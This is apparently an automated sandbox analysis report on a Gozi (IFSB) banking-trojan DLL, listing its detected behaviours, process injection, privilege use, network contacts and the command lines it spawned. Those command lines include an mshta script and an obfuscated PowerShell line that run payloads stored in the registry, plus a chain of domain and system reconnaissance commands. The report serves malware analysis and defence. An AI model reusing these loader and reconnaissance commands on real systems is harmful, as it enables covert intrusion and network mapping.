Analysis Overview
SHA256
44026db9b82303793e896838dd9e85def8b501ec72e3b64584db38212ea312f5
Threat Level: Known bad
The file f9d778ad3bfea174401f36a2d88851d8 was found to be: Known bad.
Malicious Activity Summary
Gozi, Gozi IFSB
Checks computer location settings
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Enumerates processes with tasklist
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SetWindowsHookEx
Discovers systems in the same network
Gathers system information
Runs net.exe
Suspicious behavior: MapViewOfSection
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-08-09 12:40
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-08-09 12:40
Reported
2022-08-09 12:42
Platform
win7-20220718-en
Max time kernel
42s
Max time network
46s
Command Line
Signatures
Gozi, Gozi IFSB
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1956 wrote to memory of 1968 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1956 wrote to memory of 1968 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1956 wrote to memory of 1968 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1956 wrote to memory of 1968 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1956 wrote to memory of 1968 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1956 wrote to memory of 1968 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1956 wrote to memory of 1968 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2022-08-09 12:40
Reported
2022-08-09 12:42
Platform
win10v2004-20220721-en
Max time kernel
150s
Max time network
146s
Command Line
Signatures
Gozi, Gozi IFSB
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\mshta.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1436 set thread context of 60 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE |
| PID 60 set thread context of 3524 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 60 set thread context of 3812 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 60 set thread context of 1768 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 60 set thread context of 4660 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 60 set thread context of 3584 | N/A | C:\Windows\Explorer.EXE | C:\Windows\syswow64\cmd.exe |
Enumerates physical storage devices
Discovers systems in the same network
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Gxyr='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gxyr).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\53818B71-9696-FD5C-3837-2A81EC5BFE45\\\SystemText'));if(!window.flag)close()</script>"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name nyjpos -value gp; new-alias -name jbusogjixu -value iex; jbusogjixu ([System.Text.Encoding]::ASCII.GetString((nyjpos "HKCU:Software\AppDataLow\Software\Microsoft\53818B71-9696-FD5C-3837-2A81EC5BFE45").StopName))
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\c35dm5m1\c35dm5m1.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF666.tmp" "c:\Users\Admin\AppData\Local\Temp\c35dm5m1\CSC746DBB6C54F74D7BAFF09F9D952EFF4A.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nujw4rst\nujw4rst.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF750.tmp" "c:\Users\Admin\AppData\Local\Temp\nujw4rst\CSCA36D566C37834C179A172717BBA0DA71.TMP"
C:\Windows\system32\cmd.exe
cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get domain
C:\Windows\system32\more.com
more
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\cmd.exe
cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\systeminfo.exe
systeminfo.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\net.exe
net view
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\nslookup.exe
nslookup 127.0.0.1
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\cmd.exe
cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\tasklist.exe
tasklist.exe /SVC
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\cmd.exe
cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\driverquery.exe
driverquery.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\cmd.exe
cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\reg.exe
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\net.exe
net config workstation
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 config workstation
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\nltest.exe
nltest /domain_trusts
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\nltest.exe
nltest /domain_trusts /all_trusts
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\net.exe
net view /all /domain
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\net.exe
net view /all
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
C:\Windows\system32\cmd.exe
cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\BA64.bin1 > C:\Users\Admin\AppData\Local\Temp\BA64.bin & del C:\Users\Admin\AppData\Local\Temp\BA64.bin1"
Network
| Country | Destination | Domain | Proto |
| US | 93.184.220.29:80 | | tcp |
| FR | 2.18.109.224:443 | | tcp |
| NL | 20.50.201.200:443 | | tcp |
| US | 93.184.221.240:80 | | tcp |
| US | 93.184.221.240:80 | | tcp |
| US | 93.184.221.240:80 | | tcp |
| US | 13.107.42.16:80 | config.edge.skype.com | tcp |
| NL | 79.110.52.8:80 | 79.110.52.8 | tcp |
| RU | 5.42.199.72:80 | 5.42.199.72 | tcp |
| NL | 79.110.52.82:80 | 79.110.52.82 | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.0.0.127.in-addr.arpa | udp |
Files